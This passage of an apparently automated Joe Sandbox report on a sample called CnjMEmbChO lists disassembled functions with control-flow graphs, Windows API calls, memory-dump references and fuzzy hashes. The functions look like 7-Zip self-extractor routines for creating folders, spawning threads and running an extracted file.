                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                              • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                              • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                              • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                              • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                            • wsprintfW.USER32 ref: 004044A7
                                                              • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                            • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                            • String ID: 7zSfxFolder%02d$IA
                                                            • API String ID: 3387708999-1317665167
                                                            • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                            • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                            • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                            • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58
                                                            Function 00408EA4 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 464COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 924 408f26 923->924 925 408f19-408f24 923->925 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 924->927 925->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 945 409199-4091b0 935->945 946 409019-40901c 935->946 939 409020-409035 call 40e8da call 40874d 936->939 966 408fb0-408fb2 937->966 967 408fb6-408fbb 937->967 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 945->952 953 40934c-409367 call 4087ea 945->953 946->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 968 4090ad-4090b3 955->968 969 40907f 955->969 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 964 409051-409061 call 408726 958->964 959->964 988 409063-409066 964->988 989 409068 964->989 966->967 970 408fc3-408fcf 967->970 971 408fbd-408fbf 967->971 981 409187-409196 call 408e83 968->981 982 4090b9-4090e6 call 40d94b 968->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 969->977 970->922 970->923 971->970 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->968 1016 409261-409264 978->1016 1017 4092c9 978->1017 986 4091f7-409209 979->986 987 4092b9-4092bb 979->987 981->945 1000 409283-409288 982->1000 1001 4090ec-4090f3 982->1001 1002 4093a4-4093b8 call 408761 983->1002 1003 4093ba-4093d6 983->1003 1014 409293-409295 986->1014 1015 40920f-409211 986->1015 1004 4092bf-4092c4 987->1004 996 40906a 988->996 989->996 996->955 1012 409290 1000->1012 1013 40928a-40928c 1000->1013 1008 409121-409124 1001->1008 1009 4090f5-4090f9 1001->1009 1002->1003 1080 4093d7 call 40ce70 1003->1080 1081 4093d7 call 40f160 1003->1081 1004->977 1022 4092b2-4092b7 1008->1022 1023 40912a-409138 call 408726 1008->1023 1009->1008 1018 4090fb-4090fe 1009->1018 1012->1014 1013->1012 1025 409297-409299 1014->1025 1026 40929d-4092a0 1014->1026 1015->978 1024 409213-409215 1015->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->987 1022->1004 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1050 409281 1027->1050 1028->1046 1051 409114-40911f call 40d6cb 1028->1051 1029->1004 1034 4092ac-4092ae 1029->1034 1037 4092d4-4092e0 call 408a55 1030->1037 1038 40931d-409346 call 40e959 * 2 1030->1038 1034->1022 1057 4092e2-4092ec 1037->1057 1058 4092ee-4092fa call 408aa0 1037->1058 1038->953 1038->957 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1050->1030 1051->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1066 409165-409167 1060->1066 1067 40916b-409170 1060->1067 1063->1037 1063->1038 1066->1067 1071 409172-409174 1067->1071 1072 409178-409181 1067->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                            • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID: IA$IA
                                                            • API String ID: 1033339047-1400641299
                                                            • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                            • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                            • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                            • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44
                                                            Function 00410CD0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 23COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID: $KA$4KA$HKA$\KA
                                                            • API String ID: 1294909896-3316857779
                                                            • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                            • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                            • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                            • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C
                                                            Function 004096C7 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 388COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1121 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1121 1122 40983c-409846 call 409425 1112->1122 1113->1114 1115 409780-409796 call 4094e0 call 40969d call 40e959 1114->1115 1116 4097a3-4097a8 1114->1116 1137 40979b-4097a1 1115->1137 1119 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1116->1119 1120 4097aa-4097b4 1116->1120 1125 4097f3-409809 1119->1125 1120->1119 1120->1125 1133 409881-40989a call 4010e2 call 40eb24 1121->1133 1134 409878-40987f call 40ebf7 1121->1134 1144 40984a-40984c 1122->1144 1130 40980c-409814 1125->1130 1136 409816-409825 call 409403 1130->1136 1130->1137 1154 40989d-4098c0 call 40eb19 1133->1154 1134->1133 1136->1130 1137->1109 1144->1110 1157 4098c2-4098c7 1154->1157 1158 4098f6-4098f9 1154->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1164 409954 1159->1164 1165 40994b-409952 call 409c13 1159->1165 1166 409902-409904 1160->1166 1167 409908-40991e call 409530 call 409425 1160->1167 1161->1162 1180 4098e9-4098eb 1162->1180 1181 4098ef-4098f1 1162->1181 1170 409956-40996d call 4010e2 1164->1170 1165->1170 1166->1167 1167->1159 1182 40997b-4099a0 call 409fb4 1170->1182 1183 40996f-409978 1170->1183 1180->1181 1181->1110 1186 4099a2-4099a7 1182->1186 1187 4099e3-4099e6 1182->1187 1183->1182 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1154 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1226 409aa2-409aa4 1213->1226 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1223 409a73-409a75 1218->1223 1224 409a79-409a91 call 409530 call 409425 1218->1224 1219->1213 1220->1195 1221 409adf-409ae5 1220->1221 1221->1195 1223->1224 1224->1144 1233 409a97-409a9d 1224->1233 1229 409aa6-409aa8 1226->1229 1230 409aac-409ab0 1226->1230 1229->1230 1230->1195 1233->1144
                                                            APIs
                                                            • _EH_prolog.MSVCRT ref: 004096D0
                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                              • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??2@$H_prolog
                                                            • String ID: HIA
                                                            • API String ID: 3431946709-2712174624
                                                            • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                            • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                            • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                            • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54
                                                            Function 00402844 Relevance: 6.4, APIs: 5, Instructions: 118stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                                            APIs
                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                            • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                            • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                            • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: lstrlenmemcmp$memmove
                                                            • String ID:
                                                            • API String ID: 3251180759-0
                                                            • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                            • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                            • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                            • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55
                                                            Function 0040150B Relevance: 6.1, APIs: 4, Instructions: 100synchronizationthreadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                            • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                              • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                              • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                              • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                              • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                              • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                            • String ID:
                                                            • API String ID: 359084233-0
                                                            • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                            • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                            • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                            • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E
                                                            Function 00401986 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                            • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                            • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                            • String ID:
                                                            • API String ID: 635176117-0
                                                            • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                            • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                            • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                            • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89
                                                            Function 00404A44 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                            • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID: ExecuteFile
                                                            • API String ID: 1033339047-323923146
                                                            • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                            • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                            • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                            • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D
                                                            Function 0040ADC3 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                            • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@memmove
                                                            • String ID:
                                                            • API String ID: 3828600508-0
                                                            • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                            • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                            • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                            • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                            Function 0040245A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
